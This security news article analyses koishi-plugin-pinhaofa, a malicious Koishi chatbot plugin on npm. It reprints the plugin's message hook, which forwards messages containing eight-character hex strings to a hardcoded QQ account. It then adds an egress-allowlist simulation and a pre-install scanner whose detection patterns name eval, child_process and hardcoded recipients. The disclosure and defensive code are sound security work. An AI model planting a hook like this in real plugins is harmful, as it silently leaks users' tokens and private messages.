Cybersecurity researchers have identified a supply chain attack targeting users of the Koishi chatbot framework. The attack involves a malicious npm package, koishi-plugin-pinhaofa, which presents itself as an ordinary plugin but contains code designed to exfiltrate sensitive data from the messages the chatbot processes.
Discovery and Mechanism of the Malicious Package
The package was uncovered by researchers at Socket.dev, whose AI Scanner flagged koishi-plugin-pinhaofa as known malware and prompted a deeper investigation. The package registers with the Koishi framework like any other plugin, which gives it a hook on every message the chatbot handles.
The embedded malware specifically searches for eight-character hexadecimal strings within messages. These strings often represent sensitive information such as Git commit hashes, truncated JSON Web Tokens (JWTs), or API tokens. Upon detecting such a pattern, the malware immediately forwards the entire message content to a hardcoded QQ account, potentially exposing user credentials and confidential data.
Understanding Koishi and Its Vulnerability
Koishi is a TypeScript framework designed for developing cross-platform chatbots capable of operating on multiple messaging services, including QQ, Telegram, and Discord, from a single codebase. With over a thousand community plugins available in its marketplace, Koishi has become a popular choice for businesses seeking to enhance customer engagement through chatbots.
The framework’s versatility and extensive plugin ecosystem, however, also introduce security risks. Plugins in Koishi execute directly within the bot’s trusted environment. This means that installing a plugin without thorough code review can grant malicious code unrestricted access to read and modify every message processed by the system.
Implications Across Industries
The targeted nature of this attack is particularly concerning due to its potential impact across various industries:
– Banking: Chatbots used in banking could inadvertently disclose payment card numbers or other financial information.
– E-commerce: Customer service bots might leak order-status links containing authentication tokens, compromising user accounts.
– Healthcare: Medical chatbots could expose patient information, violating privacy regulations and eroding trust.
The eight-character hex pattern is a deliberate trade-off: an isolated run of exactly eight hex characters catches abbreviated commit hashes and token fragments while ignoring ordinary prose, but it is less precise than it looks. Every decimal digit is also a hex digit, so eight-digit order numbers, dates written as 20240315 and phone-number fragments trigger it too, and because the regex demands a non-hex character (or the start or end of the message) on both sides, a full 40-character commit hash does not match at all.
Technical Analysis of the Malware
The attack’s simplicity is notable. Instead of employing complex obfuscation techniques, the malware operates through a few lines of straightforward JavaScript code that hooks into Koishi’s message handling system:
```javascript
// Helper the hook calls below; its body is not on the page and is reconstructed
// from its name and the regex: return every isolated 8-character hex run in the text.
const extractAll8DigitHex = (text) =>
  [...text.matchAll(/(?:^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})(?=[^0-9A-Fa-f]|$)/g)].map((m) => m[1]);

ctx.on('message', (session) => {                       // process every incoming message
  const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
  const content = session.content;                     // the original also applied a .replace() whose arguments did not survive extraction
  if (hexRegex.test(content)) {                        // true if an exact 8-char hex string exists…
    session.bot.sendPrivateMessage(                    // exfiltrate complete message text
      1821181277,                                      // threat actor's QQ UIN
      content);
    session.bot.sendPrivateMessage(                    // second send: only the first hex string found
      1821181277,                                      // same recipient (the only account hardcoded in the plugin)
      extractAll8DigitHex(content)[0]);
  }
});
```
This code listens for incoming messages, checks for the presence of an eight-character hexadecimal string, and if found, sends the message content to the attacker’s QQ account.
The exfiltration method is effective at evading detection because it uses the same communication channel as legitimate chatbot traffic. Since the stolen data leaves over the chat protocol the bot already speaks, network filters and endpoint defences see nothing but ordinary bot messages; the only distinguishing feature is the recipient, a QQ account that has no business receiving private messages from the bot.
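The following block is an added example, not code from the page, from Socket or from Koishi. It stubs the three Koishi objects the snippet above touches (ctx.on, session.content and session.bot.sendPrivateMessage) to show exactly which messages trigger the exfiltration path, and it wraps the bot's outbound private messages in a recipient allowlist so that a plugin cannot deliver data to an unknown account. The allowlist wrapper, the stub bot and the sample messages are assumptions made for illustration; Koishi does not ship such a policy, and the stub is synchronous where the real bot returns promises.

```javascript
// Added example: stub of the Koishi surface the malicious hook uses, plus an
// egress allowlist. None of this is Koishi's or the plugin's own code.

const HEX8 = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/; // the plugin's regex

// Does a message contain an isolated run of exactly eight hex characters?
function triggersExfiltration(content) {
  return HEX8.test(content);
}

// A bot that records outbound private messages instead of sending them.
function makeStubBot() {
  const sent = [];
  return {
    sent,
    sendPrivateMessage(userId, content) { sent.push({ userId: String(userId), content }); },
  };
}

// Wrap a bot so private messages may only go to allow-listed user IDs.
// Anything else is recorded in `denied` and rejected; that record is what an
// operator would alert on.
function guardBot(bot, allowedUserIds) {
  const allowed = new Set(allowedUserIds.map(String));
  const denied = [];
  return {
    ...bot,
    denied,
    sendPrivateMessage(userId, content) {
      if (!allowed.has(String(userId))) {
        denied.push({ userId: String(userId), content });
        throw new Error(`egress blocked: private message to ${userId}`);
      }
      return bot.sendPrivateMessage(userId, content);
    },
  };
}

// The malicious hook's behaviour as a plain function over a stub session.
// The guard's error is caught so the bot keeps serving; in the framework a
// failing listener would be logged rather than crash the process.
function maliciousHook(session) {
  if (triggersExfiltration(session.content)) {
    try { session.bot.sendPrivateMessage(1821181277, session.content); } catch { /* recorded by guard */ }
  }
}

// Constructed sample traffic (not real captures).
const SAMPLE_MESSAGES = [
  'deploying commit a1b2c3d4 to staging',              // 8-char short SHA: matches
  'order 20240315 shipped',                            // 8 digits are also hex: matches
  'full sha 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b', // 40-char run has no isolated 8-char group: no match
  'hello world',                                       // no match
];

// Feed the messages through the hook and report what left the bot.
function simulate(messages, allowedUserIds) {
  const bot = guardBot(makeStubBot(), allowedUserIds);
  for (const content of messages) maliciousHook({ content, bot });
  return { sent: bot.sent, denied: bot.denied };
}

// Stand-alone demo: an assumed operator account is the only allowed recipient,
// so both matching messages end up in `denied` and nothing is sent.
console.log(JSON.stringify(simulate(SAMPLE_MESSAGES, ['123456789']), null, 2));
```

Two things to take from the run: the all-digit order number is exfiltrated just like the commit hash, and with the allowlist in place the attempts show up as two denied sends to 1821181277, which is the signal to alert on. The same wrapper can be applied to sendMessage for channel traffic; the point is that outbound recipients are policy, not something every plugin gets to decide.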
Threat Actor Profile
The malicious package was published by an npm user with the alias kuminfennel, whose registration email matches the hardcoded QQ account that receives the exfiltrated messages. This overlap points to a deliberate, targeted effort to seed the Koishi plugin ecosystem with the package.
Broader Context of Supply Chain Attacks
This incident is part of a growing trend of supply chain attacks targeting open-source ecosystems. Malicious actors increasingly exploit the trust within these communities to distribute malware. For instance, in previous cases, attackers have uploaded malicious packages to npm that deploy reverse shells on developer systems, steal credentials, or exfiltrate sensitive data.
The open nature of platforms like npm allows for rapid innovation and collaboration but also presents significant security challenges. The ease of publishing packages makes it simple for attackers to distribute malware, emphasizing the need for vigilant security practices among developers.
Recommendations for Developers and Organizations
To mitigate the risks associated with malicious packages:
1. Conduct Thorough Code Reviews: Before integrating new plugins or packages, especially those from less-known sources, perform comprehensive code reviews to identify potential security issues.
2. Implement Automated Security Scanning: Utilize tools that can automatically scan for known vulnerabilities and malicious code within dependencies.
3. Monitor for Unusual Activity: Keep an eye on the behavior of chatbots and other applications for signs of unauthorized data transmission or other anomalies.
4. Limit Plugin Permissions: Restrict the permissions granted to plugins, ensuring they only have access to the necessary data and functions required for their operation.
5. Stay Informed: Regularly update your knowledge on emerging threats and best practices in software supply chain security.
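As an added example of recommendations 1 and 2 (not code from the page, from Socket or from Koishi), the following heuristic triage runs over a plugin's source text before it is installed. It looks for the combination that made koishi-plugin-pinhaofa malicious, a hook on every message plus an outbound send to a hardcoded recipient, and for the usual egress and obfuscation markers. The rules, weights, thresholds and the two sample plugin sources are assumptions chosen for illustration; a clean result is a reason to look less hard, not proof of safety.

```javascript
// Added example: heuristic pre-install triage for Koishi plugin source.
// Rules are illustrative assumptions, not a vetted malware signature set.

const RULES = [
  { id: 'message-hook',        weight: 1, re: /\.on\(\s*['"`]message['"`]/ },
  { id: 'literal-recipient',   weight: 3, re: /send(?:Private)?Message\(\s*\d{5,}/ },
  { id: 'hex-token-regex',     weight: 2, re: /\[0-9a-f\]\{8\}|\[0-9a-fA-F\]\{8\}|\[0-9A-Fa-f\]\{8\}/i },
  { id: 'raw-network',         weight: 2, re: /require\(\s*['"](?:node:)?(?:https?|net|dgram|child_process)['"]\)|\bfetch\(|new WebSocket\(/ },
  { id: 'dynamic-code',        weight: 2, re: /\beval\(|new Function\(|String\.fromCharCode\(/ },
  { id: 'long-base64-literal', weight: 2, re: /['"][A-Za-z0-9+\/=]{200,}['"]/ },
];

// Scan one source file; returns a score, a verdict and per-line findings.
function triagePluginSource(source) {
  const lines = source.split('\n');
  const findings = [];
  for (const rule of RULES) {
    lines.forEach((line, i) => {
      if (rule.re.test(line)) findings.push({ rule: rule.id, line: i + 1, text: line.trim() });
    });
  }
  const hit = new Set(findings.map((f) => f.rule));
  let score = 0;
  for (const rule of RULES) if (hit.has(rule.id)) score += rule.weight;
  // The combination is the strong signal: reading every message AND having a
  // way to push data out to a fixed destination.
  if (hit.has('message-hook') && (hit.has('literal-recipient') || hit.has('raw-network'))) score += 3;
  const verdict = score >= 5 ? 'review-before-install' : score > 0 ? 'low' : 'clean';
  return { score, verdict, findings };
}

// Constructed sample sources (not real packages).
const BENIGN_PLUGIN = `
export const name = 'ping'
export function apply(ctx) {
  ctx.command('ping').action(() => 'pong')
}
`;

const SUSPICIOUS_PLUGIN = `
export const name = 'pinhaofa'
export function apply(ctx) {
  ctx.on('message', (session) => {
    const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
    if (hexRegex.test(session.content)) {
      session.bot.sendPrivateMessage(1821181277, session.content)
    }
  })
}
`;

// Stand-alone demo.
for (const [label, src] of [['benign', BENIGN_PLUGIN], ['suspicious', SUSPICIOUS_PLUGIN]]) {
  const { score, verdict, findings } = triagePluginSource(src);
  console.log(label, verdict, score);
  for (const f of findings) console.log(`  line ${f.line} [${f.rule}] ${f.text}`);
}
```

Run it over the files extracted from the tarball that `npm pack <package>` downloads, which installs nothing, before any `npm install` of the plugin. A plugin that legitimately relays messages to a fixed account will also score here; the output is a prompt for the human code review in recommendation 1, not a replacement for it.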
By adopting these practices, developers and organizations can better protect themselves against the evolving landscape of supply chain attacks targeting open-source ecosystems.